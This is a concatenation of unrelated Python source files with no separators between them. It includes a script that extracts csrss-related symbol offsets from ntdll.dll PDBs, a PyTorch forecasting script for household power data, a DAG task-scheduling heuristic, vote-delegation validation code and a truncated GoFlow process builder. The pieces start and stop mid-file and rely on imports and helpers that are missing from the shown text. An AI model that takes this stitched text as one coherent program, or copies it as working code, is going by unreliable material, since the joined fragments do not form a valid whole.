20h .data:0000000180179900 CsrHeap dq ? ; DATA XREF: CsrClientConnectToServer+56 .data:0000000180179900 ; CsrpConnectToServer+76 ... .data:0000000180179908 align 20h .data:0000000180179920 HotPatchSpareGlobals db ? ; SysWOW64/ntdll.dll .data:4B3A7FF4 _CsrServerApiRoutine dd ? ; DATA XREF: RtlRegisterThreadWithCsrss()+6EC60 .data:4B3A7FF4 ; RtlRegisterThreadWithCsrss()+6EC85 .data:4B3A7FF8 _CsrClientProcess db ? ; DATA XREF: CsrClientConnectToServer(x,x,x,x,x)+28 .data:4B3A7FF8 ; RtlRegisterThreadWithCsrss():loc_4B31D554 .data:4B3A7FF9 _CsrInitOnceDone db ? ; DATA XREF: RtlRegisterThreadWithCsrss()+1F .data:4B3A7FFA align 10h .data:4B3A8000 _HotPatchSpareGlobals db ? ; """ import pdbparse def symbol_addresses(pdb,base=0): from operator import itemgetter, attrgetter class DummyOmap(object): def remap(self, addr): return addr addrs = {} try: # Do this the hard way to avoid having to load # the types stream in mammoth PDB files pdb.STREAM_DBI.load() pdb._update_names() pdb.STREAM_GSYM = pdb.STREAM_GSYM.reload() if pdb.STREAM_GSYM.size: pdb.STREAM_GSYM.load() pdb.STREAM_SECT_HDR = pdb.STREAM_SECT_HDR.reload() pdb.STREAM_SECT_HDR.load() # These are the dicey ones pdb.STREAM_OMAP_FROM_SRC = pdb.STREAM_OMAP_FROM_SRC.reload() pdb.STREAM_OMAP_FROM_SRC.load() pdb.STREAM_SECT_HDR_ORIG = pdb.STREAM_SECT_HDR_ORIG.reload() pdb.STREAM_SECT_HDR_ORIG.load() except AttributeError as e: pass # except Exception as e: # print ("WARN: error %s parsing %s, skipping" % (e,pdbbase)) # not_found.append( (base, pdbbase) ) # continue try: sects = pdb.STREAM_SECT_HDR_ORIG.sections omap = pdb.STREAM_OMAP_FROM_SRC except AttributeError as e: # In this case there is no OMAP, so we use the given section # headers and use the identity function for omap.remap sects = pdb.STREAM_SECT_HDR.sections omap = DummyOmap() gsyms = pdb.STREAM_GSYM if not hasattr(gsyms, 'globals'): gsyms.globals = [] last_sect = max(sects, key = attrgetter('VirtualAddress')) limit = base + last_sect.VirtualAddress + last_sect.Misc.VirtualSize for sym in gsyms.globals: if not hasattr(sym, 'offset'): continue off = sym.offset try: virt_base = sects[sym.segment - 1].VirtualAddress except IndexError: continue mapped = omap.remap(off + virt_base) + base addrs[sym.name]=mapped return addrs def main(): import platform genfile = 'csrss_offsets.h' me = os.path.basename(__file__) f = open(genfile, 'w') f.write('// This file was generated by a tool. Do not edit it manually!\n') f.write('// To regenerate it, please run ' + me + '\n\n') if platform.machine().endswith('64'): f.write('// This header is generated to target 64-bit Windows including SysWoW64\n\n') else: f.write('// This header is generated to target 32-bit Windows ONLY\n\n') f.write('#pragma once\n\n') if platform.machine().endswith('64'): f.write('#ifdef _WIN64\n\n') ntdll_pdb = handle_pe("C:\\Windows\\system32\\ntdll.dll") sys.stderr.write("Loading symbols for %s...\n" % ntdll_pdb) pdb = pdbparse.parse(ntdll_pdb, fast_load = True) addrs = symbol_addresses(pdb) rva_CsrServerApiRoutine_x64 = addrs['CsrServerApiRoutine'] rva_RtlpUnloadEventTraceEx_x64 = addrs['RtlpUnloadEventTraceEx'] f.write('// RVA of CsrServerApiRoutine up to RtlpUnloadEventTraceEx in System32\\ntdll.exe\n') f.write('#define csrDataRva_x64 ' + hex(rva_CsrServerApiRoutine_x64) + '\n') f.write('// RtlpUnloadEventTraceEx = ' + hex(rva_RtlpUnloadEventTraceEx_x64) + '\n') f.write('#define csrDataSize_x64 ' + hex(rva_RtlpUnloadEventTraceEx_x64 - rva_CsrServerApiRoutine_x64) + '\n') f.write('\n') f.write('#else\n\n') ntdll_pdb = handle_pe("C:\\Windows\\SysWOW64\\ntdll.dll") sys.stderr.write("Loading symbols for %s...\n" % ntdll_pdb) pdb = pdbparse.parse(ntdll_pdb, fast_load = True) addrs = symbol_addresses(pdb) rva_CsrServerApiRoutine = addrs['_CsrServerApiRoutine'] rva_RtlpUnloadEventTraceEx = addrs['_RtlpUnloadEventTraceEx'] f.write('// WoW64 ntdll.dll\n') f.write('// RVA of _CsrServerApiRoutine up to _RtlpUnloadEventTraceEx in SysWOW64\\ntdll.dll\n') f.write('#define csrDataRva_x86 ' + hex(rva_CsrServerApiRoutine) + '\n') f.write('// RtlpUnloadEventTraceEx = ' + hex(rva_RtlpUnloadEventTraceEx) + '\n') f.write('#define csrDataSize_x86 ' + hex(rva_RtlpUnloadEventTraceEx - rva_CsrServerApiRoutine) + '\n') f.write('\n') f.write('// RVA of CsrServerApiRoutine up to RtlpUnloadEventTraceEx in System32\\ntdll.exe\n') f.write('#define csrDataRva_wow64 ' + hex(rva_CsrServerApiRoutine_x64) + '\n') f.write('// RtlpUnloadEventTraceEx = ' + hex(rva_RtlpUnloadEventTraceEx_x64) + '\n') f.write('#define csrDataSize_wow64 ' + hex(rva_RtlpUnloadEventTraceEx_x64 - rva_CsrServerApiRoutine_x64) + '\n') f.write('\n') f.write('#endif\n') else: f.write('#ifdef WIN64\n\n') f.write('#error 64-bit csrss offsets missing; please consult ' + me + '\n') f.write('#define csrDataRva_x64 0\n') f.write('#define csrDataSize_x64 0\n') f.write('#define csrDataRva_wow64 0\n') f.write('#define csrDataSize_wow64 0\n') f.write('\n') f.write('#else\n\n') ntdll_pdb = handle_pe("C:\\Windows\\system32\\ntdll.dll") sys.stderr.write("Loading symbols for %s...\n" % ntdll_pdb) pdb = pdbparse.parse(ntdll_pdb, fast_load = True) addrs = symbol_addresses(pdb) rva_CsrServerApiRoutine = addrs['CsrServerApiRoutine'] rva_RtlpUnloadEventTraceEx = addrs['RtlpUnloadEventTraceEx'] f.write('// RVA of CsrServerApiRoutine up to RtlpUnloadEventTraceEx in System32\\ntdll.exe\n') f.write('#define csrDataRva_x86 ' + hex(rva_CsrServerApiRoutine) + '\n') f.write('// RtlpUnloadEventTraceEx = ' + hex(rva_RtlpUnloadEventTraceEx) + '\n') f.write('#define csrDataSize_x86 ' + hex(rva_RtlpUnloadEventTraceEx - rva_CsrServerApiRoutine) + '\n') f.write('\n') f.write('// WoW64 not supported on native 32-bit platform\n') f.write('#define csrDataRva_wow64 0\n') f.write('#define csrDataSize_wow64 0\n') f.write('\n') f.write('#endif\n') f.close() print 'Successfully generated ' + genfile if __name__ == "__main__": main()
import pickle from optparse import OptionParser import networkx as nx import matplotlib.pyplot as plt import numpy as np from numpy.core.fromnumeric import mean import pandas as pd import torch import torch.optim as optim import torch.nn as nn from sklearn.preprocessing import StandardScaler from symp_extract.consts import include_cols import dgl from functools import reduce from models.utils import device, float_tensor, long_tensor from models.multimodels import ( EmbedEncoder, GRUEncoder, EmbGCNEncoder, LatentEncoder, CorrEncoder, Decoder, ) parser = OptionParser() parser.add_option("-w", "--week", dest="week_ahead", type="int", default=2) parser.add_option("-y", "--year", dest="year", type="int", default=2020) parser.add_option("-n", "--num", dest="num", type="string") parser.add_option("-e", "--epoch", dest="epochs", type="int", default="1500") (options, args) = parser.parse_args() with open("./data/household_power_consumption/household_power_consumption.txt", "r") as f: data = f.readlines() data = [d.strip().split(";") for d in data][1:] def get_month(ss: str): i = ss.find("/") return int(ss[i+1:ss[i+1:].find("/")+i + 1]) - 1 def get_time_of_day(ss: str): hour = int(ss[:2]) if hour < 6: return 0 elif hour < 12: return 1 elif hour < 18: return 2 else: return 3 tod = np.array([get_time_of_day(d[1]) for d in data], dtype=np.int32) month = np.array([get_month(d[0]) for d in data], dtype=np.int32) features = [] for d in data: f = [] for x in d[2:]: try: f.append(float(x)) except: f.append(0.0) features.append(f) features = np.array(features) target = features[:, 0] total_time = len(data) test_start = int(total_time * 0.8) X, X_symp, Y, mt, reg = [], [], [], [], [] def sample_train(n_samples, window = 20): X, X_symp, Y, mt, reg = [], [], [], [], [] start_seqs = np.random.randint(0, test_start, n_samples) for start_seq in start_seqs: X.append(target[start_seq:start_seq+window, np.newaxis]) X_symp.append(features[start_seq:start_seq+window]) Y.append(target[start_seq+window]) mt.append(month[start_seq+window]) reg.append(tod[start_seq+window]) X = np.array(X) X_symp = np.array(X_symp) Y = np.array(Y) mt = np.array(mt) reg = np.array(reg) return X, X_symp, Y, mt, reg def sample_test(n_samples, window = 20): X, X_symp, Y, mt, reg = [], [], [], [], [] start_seqs = np.random.randint(test_start, total_time, n_samples) for start_seq in start_seqs: X.append(target[start_seq:start_seq+window, np.newaxis]) X_symp.append(features[start_seq:start_seq+window]) Y.append(target[start_seq+window]) mt.append(month[start_seq+window]) reg.append(tod[start_seq+window]) X = np.array(X) X_symp = np.array(X_symp) Y = np.array(Y) mt = np.array(mt) reg = np.array(reg) return X, X_symp, Y, mt, reg # Reference points splits = 10 len_seq = test_start//splits seq_references = np.array([features[i: i+len_seq, 0, np.newaxis] for i in range(0, test_start, len_seq)])[:, :100, :] symp_references = np.array([features[i: i+len_seq] for i in range(0, test_start, len_seq)])[:, :100, :] month_references = np.arange(12) reg_references = np.arange(4) train_seqs, train_symp_seqs, train_y, mt, reg = sample_train(100) month_enc = EmbedEncoder(in_size=12, out_dim=60).to(device) seq_encoder = GRUEncoder(in_size=1, out_dim=60).to(device) symp_encoder = GRUEncoder(in_size=7, out_dim=60).to(device) reg_encoder = EmbedEncoder(in_size=5, out_dim=60).to(device) stoch_month_enc = LatentEncoder(in_dim=60, hidden_layers=[60], out_dim=60).to(device) stoch_seq_enc = LatentEncoder(in_dim=60, hidden_layers=[60], out_dim=60).to(device) stoch_symp_enc = LatentEncoder(in_dim=60, hidden_layers=[60], out_dim=60).to(device) stoch_reg_enc = LatentEncoder(in_dim=60, hidden_layers=[60], out_dim=60).to(device) month_corr = CorrEncoder( in_data_dim=60, in_data_det_dim=60, in_ref_dim=60, in_ref_det_dim=60, hidden_dim=60, q_layers=2, same_decoder=True, ).to(device) seq_corr = CorrEncoder( in_data_dim=60, in_data_det_dim=60, in_ref_dim=60, in_ref_det_dim=60, hidden_dim=60, q_layers=2, same_decoder=True, ).to(device) symp_corr = CorrEncoder( in_data_dim=60, in_data_det_dim=60, in_ref_dim=60, in_ref_det_dim=60, hidden_dim=60, q_layers=2, same_decoder=True, ).to(device) reg_corr = CorrEncoder( in_data_dim=60, in_data_det_dim=60, in_ref_dim=60, in_ref_det_dim=60, hidden_dim=60, q_layers=2, same_decoder=True, ).to(device) decoder = Decoder(z_dim=60, sr_dim=60, latent_dim=60, hidden_dim=60, y_dim=1).to(device) models = [ month_enc, seq_encoder, symp_encoder, reg_encoder, stoch_month_enc, stoch_seq_enc, stoch_symp_enc, stoch_reg_enc, month_corr, seq_corr, symp_corr, reg_corr, decoder, ] opt = optim.Adam( reduce(lambda x, y: x + y, [list(m.parameters()) for m in models]), lr=1e-3 ) # Porbabilistic encode of reference points ref_months = month_enc.forward(long_tensor(month_references)) ref_seq = seq_encoder.forward(float_tensor(seq_references)) ref_symp = symp_encoder.forward(float_tensor(symp_references)) ref_reg = reg_encoder.forward(long_tensor(reg_references)) stoch_ref_months = stoch_month_enc.forward(ref_months)[0] stoch_ref_seq = stoch_seq_enc.forward(ref_seq)[0] stoch_ref_symp = stoch_symp_enc.forward(ref_symp)[0] stoch_ref_reg = stoch_reg_enc.forward(ref_reg)[0] # Probabilistic encode of training points train_months = month_enc.forward(long_tensor(mt.astype(int))) train_seq = seq_encoder.forward(float_tensor(train_seqs)) train_symp = symp_encoder.forward(float_tensor(train_symp_seqs)) train_reg = reg_encoder.forward(long_tensor(reg.astype(int))) stoch_train_months = stoch_month_enc.forward(train_months)[0] stoch_train_seq = stoch_seq_enc.forward(train_seq)[0] stoch_train_symp = stoch_symp_enc.forward(train_symp)[0] stoch_train_reg = stoch_reg_enc.forward(train_reg)[0] def train(train_seqs, train_symp_seqs, reg, mt, train_y): for m in models: m.train() opt.zero_grad() # Porbabilistic encode of reference points ref_months = month_enc.forward(long_tensor(month_references)) ref_seq = seq_encoder.forward(float_tensor(seq_references)) ref_symp = symp_encoder.forward(float_tensor(symp_references)) ref_reg = reg_encoder.forward(long_tensor(reg_references)) stoch_ref_months = stoch_month_enc.forward(ref_months)[0] stoch_ref_seq = stoch_seq_enc.forward(ref_seq)[0] stoch_ref_symp = stoch_symp_enc.forward(ref_symp)[0] stoch_ref_reg = stoch_reg_enc.forward(ref_reg)[0] # Probabilistic encode of training points train_months = month_enc.forward(long_tensor(mt.astype(int))) train_seq = seq_encoder.forward(float_tensor(train_seqs)) train_symp = symp_encoder.forward(float_tensor(train_symp_seqs)) train_reg = reg_encoder.forward(long_tensor(reg.astype(int))) stoch_train_months = stoch_month_enc.forward(train_months)[0] stoch_train_seq = stoch_seq_enc.forward(train_seq)[0] stoch_train_symp = stoch_symp_enc.forward(train_symp)[0] stoch_train_reg = stoch_reg_enc.forward(train_reg)[0] # Get view-aware latent embeddings train_months_z, train_month_sr, _, month_loss, _ = month_corr.forward( stoch_ref_months, stoch_train_months, ref_months, train_months ) train_seq_z, train_seq_sr, _, seq_loss, _ = seq_corr.forward( stoch_ref_seq, stoch_train_seq, ref_seq, train_seq ) train_symp_z, train_symp_sr, _, symp_loss, _ = symp_corr.forward( stoch_ref_symp, stoch_train_symp, ref_symp, train_symp ) train_reg_z, train_reg_sr, _, reg_loss, _ = reg_corr.forward( stoch_ref_reg, stoch_train_reg, ref_reg, train_reg ) # Concat all latent embeddings train_z = torch.stack( [train_months_z, train_seq_z, train_symp_z, train_reg_z], dim=1 ) train_sr = torch.stack( [train_month_sr, train_seq_sr, train_symp_sr, train_reg_sr], dim=1 ) loss, mean_y, _, _ = decoder.forward( train_z, train_sr, train_seq, float_tensor(train_y)[:, None] ) losses = month_loss + seq_loss + symp_loss + reg_loss + loss losses.backward() opt.step() print(f"Loss = {loss.detach().cpu().numpy()}") return ( mean_y.detach().cpu().numpy(), losses.detach().cpu().numpy(), loss.detach().cpu().numpy(), ) def evaluate(test_seqs, test_symp_seqs, reg_test, mt_test, test_y, sample=True): for m in models: m.eval() # Porbabilistic encode of reference points ref_months = month_enc.forward(long_tensor(month_references)) ref_seq = seq_encoder.forward(float_tensor(seq_references)) ref_symp = symp_encoder.forward(float_tensor(symp_references)) ref_reg = reg_encoder.forward(long_tensor(reg_references)) stoch_ref_months = stoch_month_enc.forward(ref_months)[0] stoch_ref_seq = stoch_seq_enc.forward(ref_seq)[0] stoch_ref_symp = stoch_symp_enc.forward(ref_symp)[0] stoch_ref_reg = stoch_reg_enc.forward(ref_reg)[0] # Probabilistic encode of test points test_months = month_enc.forward(long_tensor(mt_test.astype(int))) test_seq = seq_encoder.forward(float_tensor(test_seqs)) test_symp = symp_encoder.forward(float_tensor(test_symp_seqs)) test_reg = reg_encoder.forward(long_tensor(reg_test.astype(int))) stoch_test_months = stoch_month_enc.forward(test_months)[0] stoch_test_seq = stoch_seq_enc.forward(test_seq)[0] stoch_test_symp = stoch_symp_enc.forward(test_symp)[0] stoch_test_reg = stoch_reg_enc.forward(test_reg)[0] # Get view-aware latent embeddings test_months_z, test_month_sr, _, _, _, _ = month_corr.predict( stoch_ref_months, stoch_test_months, ref_months, test_months ) test_seq_z, test_seq_sr, _, _, _, _ = seq_corr.predict( stoch_ref_seq, stoch_test_seq, ref_seq, test_seq ) test_symp_z, test_symp_sr, _, _, _, _ = symp_corr.predict( stoch_ref_symp, stoch_test_symp, ref_symp, test_symp ) test_reg_z, test_reg_sr, _, _, _, _ = reg_corr.predict( stoch_ref_reg, stoch_test_reg, ref_reg, test_reg ) # Concat all latent embeddings test_z = torch.stack([test_months_z, test_seq_z, test_symp_z, test_reg_z], dim=1) test_sr = torch.stack( [test_month_sr, test_seq_sr, test_symp_sr, test_reg_sr], dim=1 ) sample_y, mean_y, _, _ = decoder.predict( test_z, test_sr, test_seq, sample=sample ) sample_y = sample_y.detach().cpu().numpy().ravel() mean_y = mean_y.detach().cpu().numpy().ravel() # RMSE loss rmse = np.sqrt(np.mean((sample_y - test_y.ravel()) ** 2)) # Mean absolute error # mae = np.mean(np.abs(sample_y - test_y)) print(f"RMSE = {rmse}") return rmse, mean_y, sample_y for ep in range(1, 1000 + 1): train_seqs, train_symp_seqs, train_y, mt, reg = sample_train(100) train(train_seqs, train_symp_seqs, reg, mt, train_y) if ep % 10 == 0: print("Evaluating") test_seqs, test_symp_seqs, test_y, mt_test, reg_test = sample_test(100) evaluate(test_seqs, test_symp_seqs, reg_test, mt_test, test_y)
import sys from random import shuffle from heapq import heappush, heappop, heapify cin = sys.stdin cout = sys.stdout def find_schedule(graph, p, ls): schedule = [[] for i in range(p)] child = succ parent = pred # n = len(time) done = [False]*n end_time = [-1]*n donect=0 heap = [(0,i) for i in range(p)] heapify(heap) while donect < n: item = heappop(heap) tproc = item[0] proc = item[1] lefttask = -1 for i in range(n): task=ls[i] if done[task]: continue flag=True for par in parent[task]: if end_time[par]<0 or end_time[par]>tproc: flag=False break if flag: lefttask=task break if lefttask!=-1: heappush(heap,(tproc+time[lefttask],proc)) schedule[proc].append(lefttask) donect+=1 done[lefttask]=True end_time[lefttask]=tproc+time[lefttask] else: tmp = [] while heap and heap[0][0]==tproc: tmp.append(heappop(heap)) if(heap): new_time = heap[0][0] else: new_time = tproc+1 while tmp: heappush(heap,(new_time,(tmp.pop())[1])) heappush(heap,(new_time,proc)) mtime = max(elem[0] for elem in heap) return schedule,mtime def finish_time(graph,schedule,time): pos = [(-1,-1) for i in range(n)] for i in range(len(schedule)) : for j in range(len(schedule[i])) : pos[schedule[i][j]]=(i,j) for elem in pos : assert elem!=(-1,-1) time_tasks = [-1]*n for i in range(n): if time_tasks[i]==-1: S = [] S.append(i) while S : task = S[-1] x,y = pos[task] ptask = schedule[x][y-1] if y else -1 if time_tasks[task]!=-1: S.pop() min_par = max([time_tasks[par] for par in parent[task]] or [0]) minimum = min_par if y==0 else max(min_par,time_tasks[ptask]) time_tasks[task] = time[task]+minimum else: time_tasks[task]=0 if y: S.append(ptask) for par in parent[task]: if time_tasks[par]==-1 and par!=ptask: S.append(par) return max(time_tasks) def sanity_check(schedule,num_tasks,res_time): sm = sum(len(processor) for processor in schedule) assert sm==num_tasks pos = [(-1,-1) for i in range(num_tasks)] for i in range(len(schedule)) : for j in range(len(schedule[i])) : pos[schedule[i][j]]=(i,j) for elem in pos : assert elem!=(-1,-1) for proc in schedule: for i in range(0,len(proc)): task = proc[i] pari = pred[task] for j in range(i+1,len(proc)): task2 = proc[j] assert task2 not in pari assert finish_time(graph,schedule,time)==res_time num_tasks,num_edges,num_proc, = map(int,cin.readline().split(' ')) time = list(map(int,cin.readline().split(' '))) n=len(time) assert n==num_tasks graph=[[0 for j in range(n)] for i in range(n)] pred = [[] for i in range(n)] succ = [[] for i in range(n)] for i in range(num_edges): a,b = map(int,cin.readline().split(' ')) graph[a][b]=1 for k in range(n): for i in range(n): for j in range(n): if graph[i][k] and graph[k][j] : graph[i][j]=1 for i in range(n): for j in range(n): if graph[i][j] : for k in range(n): if graph[j][k]: graph[i][k]=0 for i in range(n): for j in range(n): if graph[i][j]: succ[i].append(j) pred[j].append(i) parent=pred child=succ ## Increasing order of time ls = [(time[i],i) for i in range(n)] ls.sort(key=lambda x:x[0],reverse=False) ls2=[] for i in range(len(ls)): ls2.append(ls[i][1]) ls=ls2 result = find_schedule(graph,num_proc,ls) schedule = result[0] # sanity_check(schedule,num_tasks) # print ("Increasing order of time") # for proc in schedule: # print [task for task in proc] # assert finish_time(graph,schedule,time)==result[1] # print(result[1]) bestschedule=schedule besttime=result[1] worstschedule=schedule worsttime=result[1] ## Decreasing order of time ls = [(time[i],i) for i in range(n)] ls.sort(key=lambda x:x[0],reverse=True) ls2=[] for i in range(len(ls)): ls2.append(ls[i][1]) ls=ls2 result = find_schedule(graph,num_proc,ls) schedule = result[0] # sanity_check(schedule,num_tasks) # print ("Decreasing order of time:") # for proc in schedule: # print ([task for task in proc]) # assert finish_time(graph,schedule,time)==result[1] # print (result[1]) if(result[1]<besttime): besttime=result[1] bestschedule=schedule if(result[1]>worsttime): worsttime=result[1] worstschedule=schedule ## Random permutations lim=40*n ls = [i for i in range(n)] shuffle(ls) for i in range(lim): shuffle(ls) # print(ls) result = find_schedule(graph,num_proc,ls) schedule = result[0] # sanity_check(schedule,num_tasks) # for proc in schedule: # print [task for task in proc] # temp=finish_time(graph,schedule,time) # print(temp) # assert temp==result[1] # print temp,result[1] if(result[1]<besttime): besttime=result[1] bestschedule=schedule if(result[1]>worsttime): worsttime=result[1] worstschedule=schedule sanity_check(bestschedule,num_tasks,besttime) sanity_check(worstschedule,num_tasks,worsttime) # print("Result of random permutations:") # for proc in bestschedule: # print [task for task in proc] cout.write(str(besttime)+",") # fd=open("result.txt",'a') # fd.write(str(besttime)+",") # fd.close() # for proc in worstschedule: # print [task for task in proc] # print "\tWorst="+str(worsttime) cout.write(str(worsttime)+",") ## Topologically sorted permutations roots=[] for i in range(n): if(pred[i]==[]): roots.append(i) bs=[] bt=1000000000 wt=0 ws=[] lim=4*n numroots=len(roots) # permute roots lim times for num in range(lim): shuffle(roots) topo=[] tk=0 taken=[0 for i in range(n)] for i in range(numroots): topo.append(roots[i]) taken[roots[i]]=1 tk+=1 while(tk<n): poss=[] for i in range(n): if taken[i]==1: continue temp=0 for j in pred[i]: if(taken[j]==1): temp+=1 if(temp==len(pred[i])): poss.append(i) order=[] lenp=len(poss) for i in range(lenp): a=poss[i] mind=-1 distances=[] for j in range(len(topo)): if(topo[j] in pred[a]): mind=max(mind,j) distances.append(len(topo)-j) distances.sort() order.append((distances,poss[i])) order.sort(reverse=True) take=order[0][1] topo.append(take) taken[take]=1 tk+=1 # print topo result = find_schedule(graph,num_proc,topo) schedule = result[0] if(result[1]<bt): bt=result[1] bs=schedule # if(result[1]>wt): # wt=result[1] # ws=schedule # sanity_check(schedule,num_tasks) # for proc in schedule: # print [task for task in proc] # assert finish_time(graph,schedule,time)==result[1] sanity_check(bs,num_tasks,bt) # print ("Result of Topological sorts:") # for proc in bs: # print ([task for task in proc]) cout.write(str(bt)+"\n") # fd=open("result.txt",'a') # fd.write(str(bt)+"\n") # fd.close() # for proc in ws: # print [task for task in proc] # print "\tWorst="+str(wt)
from collections import defaultdict from functools import reduce from typing import Any, Dict, List from ....services.datastore.commands import GetManyRequest from ....shared.exceptions import ActionException from ....shared.filters import FilterOperator from ....shared.patterns import Collection, FullQualifiedId from ...action import Action from ...util.assert_belongs_to_meeting import assert_belongs_to_meeting class UserMixin(Action): def update_instance(self, instance: Dict[str, Any]) -> Dict[str, Any]: instance = super().update_instance(instance) user_fqid = FullQualifiedId(Collection("user"), instance["id"]) if "username" in instance: result = self.datastore.filter( Collection("user"), FilterOperator("username", "=", instance["username"]), ["id"], ) if result and instance["id"] not in result.keys(): raise ActionException( f"A user with the username {instance['username']} already exists." ) self.check_existence_of_to_and_from_users(instance) self.check_meeting_and_users(instance, user_fqid) if "vote_delegated_$_to_id" in instance: self.check_vote_delegated__to_id(instance, user_fqid) if "vote_delegations_$_from_ids" in instance: self.check_vote_delegations__from_ids(instance, user_fqid) if "username" in instance and not instance["username"].strip(): raise ActionException("This username is forbidden.") return instance def check_vote_delegated__to_id( self, instance: Dict[str, Any], user_fqid: FullQualifiedId ) -> None: mapped_fields = [ f"vote_delegations_${meeting_id}_from_ids" for meeting_id, delegated_to in instance["vote_delegated_$_to_id"].items() if delegated_to ] if not mapped_fields: return user_self = self.datastore.fetch_model( user_fqid, mapped_fields, exception=False ) if "vote_delegations_$_from_ids" in instance: update_dict = { f"vote_delegations_${meeting_id}_from_ids": delegated_from for meeting_id, delegated_from in instance[ "vote_delegations_$_from_ids" ].items() } user_self.update(update_dict) for meeting_id, delegated_to_id in instance["vote_delegated_$_to_id"].items(): if user_fqid.id == delegated_to_id: raise ActionException( f"User {delegated_to_id} can't delegate the vote to himself." ) if user_self.get(f"vote_delegations_${meeting_id}_from_ids"): raise ActionException( f"User {user_fqid.id} cannot delegate his vote, because there are votes delegated to him." ) mapped_field = f"vote_delegated_${meeting_id}_to_id" user_delegated_to = self.datastore.fetch_model( FullQualifiedId(Collection("user"), delegated_to_id), [mapped_field], ) if user_delegated_to.get(mapped_field): raise ActionException( f"User {user_fqid.id} cannot delegate his vote to user {delegated_to_id}, because that user has delegated his vote himself." ) def check_vote_delegations__from_ids( self, instance: Dict[str, Any], user_fqid: FullQualifiedId ) -> None: mapped_fields = [ f"vote_delegated_${meeting_id}_to_id" for meeting_id, delegated_from in instance[ "vote_delegations_$_from_ids" ].items() if delegated_from ] if not mapped_fields: return user_self = self.datastore.fetch_model( user_fqid, mapped_fields, exception=False ) if "vote_delegated_$_to_id" in instance: update_dict = { f"vote_delegated_${meeting_id}_to_id": delegated_to for meeting_id, delegated_to in instance[ "vote_delegated_$_to_id" ].items() } user_self.update(update_dict) for meeting_id, delegated_from_ids in instance[ "vote_delegations_$_from_ids" ].items(): if user_fqid.id in delegated_from_ids: raise ActionException( f"User {user_fqid.id} can't delegate the vote to himself." ) if user_self.get(f"vote_delegated_${meeting_id}_to_id"): raise ActionException( f"User {user_fqid.id} cannot receive vote delegations, because he delegated his own vote." ) mapped_field = f"vote_delegations_${meeting_id}_from_ids" error_user_ids: List[int] = [] for user_id in delegated_from_ids: user = self.datastore.fetch_model( FullQualifiedId(Collection("user"), user_id), [mapped_field], ) if user.get(mapped_field): error_user_ids.append(user_id) if error_user_ids: raise ActionException( f"User(s) {error_user_ids} can't delegate their votes because they receive vote delegations." ) def check_existence_of_to_and_from_users(self, instance: Dict[str, Any]) -> None: user_ids = set( filter(bool, instance.get("vote_delegated_$_to_id", dict()).values()) ) if "vote_delegations_$_from_ids" in instance: user_ids = user_ids.union( set( reduce( (lambda x, y: x + y), # type: ignore instance["vote_delegations_$_from_ids"].values(), [], ) ) ) if user_ids: get_many_request = GetManyRequest( self.model.collection, list(user_ids), ["id"] ) gm_result = self.datastore.get_many([get_many_request]) users = gm_result.get(self.model.collection, {}) set_action_data = user_ids diff = set_action_data.difference(users.keys()) if len(diff): raise ActionException(f"The following users were not found: {diff}") def check_meeting_and_users( self, instance: Dict[str, Any], user_fqid: FullQualifiedId ) -> None: user_collection = Collection("user") meeting_users = defaultdict(list) if instance.get("group_$_ids") is not None: self.datastore.update_additional_models( user_fqid, { **{ f"group_${meeting_id}_ids": ids for meeting_id, ids in instance.get("group_$_ids", {}).items() }, "meeting_ids": [ int(id) for id in instance.get("group_$_ids", {}).keys() ], }, ) if instance.get("meeting_id") is not None: self.datastore.update_additional_models( user_fqid, {"meeting_id": instance.get("meeting_id")} ) for meeting_id, user_id in instance.get("vote_delegated_$_to_id", {}).items(): if user_id: meeting_users[meeting_id].append( FullQualifiedId(user_collection, user_id) ) for meeting_id, user_ids in instance.get( "vote_delegations_$_from_ids", {} ).items(): if user_ids: meeting_users[meeting_id].extend( [FullQualifiedId(user_collection, user_id) for user_id in user_ids] ) for meeting_id, users in meeting_users.items(): users.append(user_fqid) assert_belongs_to_meeting(self.datastore, users, int(meeting_id))
import django.db.models from goflow.workflow.models import * DEBUG = True def log(section, variable): if DEBUG: print('adding [%s] %s' % (section, variable)) else: pass # ------------------------------------------------------------------------------------ # a class based Process Builder for GoFlow # ------------------------------------------------------------------------------------ class ProcessBuilder(object): def __init__(self, title='', description='', enabled=True, priority=0, start_activity='begin', end_activity='end'): self.process = self.create_process(title=title, description=description, enabled=enabled, priority=priority) self.process_role = self.create_process_role() self.start_activity = start_activity self.end_activity = end_activity self.users = {} self.roles = {} self.applications = {} self.activities = {} self.transitions = {} def add_application(self, url='', suffix='w'): app = Application(url=url, suffix=suffix) log('application', app) app.save() return app def add_applications(self, applications): self.applications = applications def add_pushapp(self, url=None): if url: pushapp, new = PushApplication.objects.get_or_create(url=url) if new: pushapp.save() return pushapp else: return def add_activity(self, title='', description='', kind='standard', push_application=None, pushapp_param='', application='', app_param='', autostart=False, autofinish=True, join_mode='and', split_mode='xor', roles=[]): ''' creates a single activity instance ''' activity = Activity(title=title, description=description, kind=kind, process=self.process, push_application=push_application, pushapp_param=pushapp_param, application=application, app_param=repr(app_param), autostart=autostart, autofinish=autofinish, join_mode=join_mode, split_mode=split_mode ) log('activity', activity) activity.save() for role in roles: activity.roles.add(self.roles[role]) activity.save() self.activities[title] = activity return activity def add_activities(self, activities): _activities = [] for title, kind, pushapp, app, autostart, autofinish, join, split, roles in activities: _activities.append(self.add_activity( title=title, kind=kind, push_application=self.add_pushapp(pushapp), application=self.add_application(url=self.applications[app]['url']), app_param=self.applications[app]['parameters'], autostart=autostart, autofinish=autofinish, join_mode=join, split_mode=split, roles=roles )) return _activities def add_transition(self, input_output=(None, None), name='', condition=''): input=self.activities[input_output[0]] output=self.activities[input_output[1]] t = Transition(name=name, process=self.process, input=input, output=output, condition=condition) log('transition', t) t.save() self.transitions[name] = t return t def add_transitions(self, transitions): ts = [] for input_output, name, condition in transitions: ts.append(self.add_transition(input_output, name, condition)) return ts def create_process(self, title='', begin=None, end=None, description='', enabled=True, priority=0): process = Process(title=title, description=description, enabled=enabled, priority=priority) log('process', process) process.begin = begin process.end = end process.save() return process def create_process_role(self): process_role = Group.objects.create(name=self.process.title) log('role|group', process_role) process_ctype = ContentType.objects.get_for_model(Process) can_instantiate_permission = Permission.objects.get(content_type=process_ctype, codename='can_instantiate') process_role.permissions.add(can_instantiate_permission) log('permission', can_instantiate_permission) return process_role def add_user(self, name, email, password, is_staff=True, is_active=True, is_superuser=False, roles=[]): ''' This is the least generic, but that is deliberate to fully test everything. ''' user = User.objects.create_user(name, email, password) log('user', user) if is_staff: user.is_staff=True if is_active: user.is_active=True #TODO: this is just for testing and will/should be removed if name == 'admin': user.is_superuser = True if roles: for rolename in roles: role = Group.objects.get(name=rolename) user.groups.add(role) log('%s.role' % 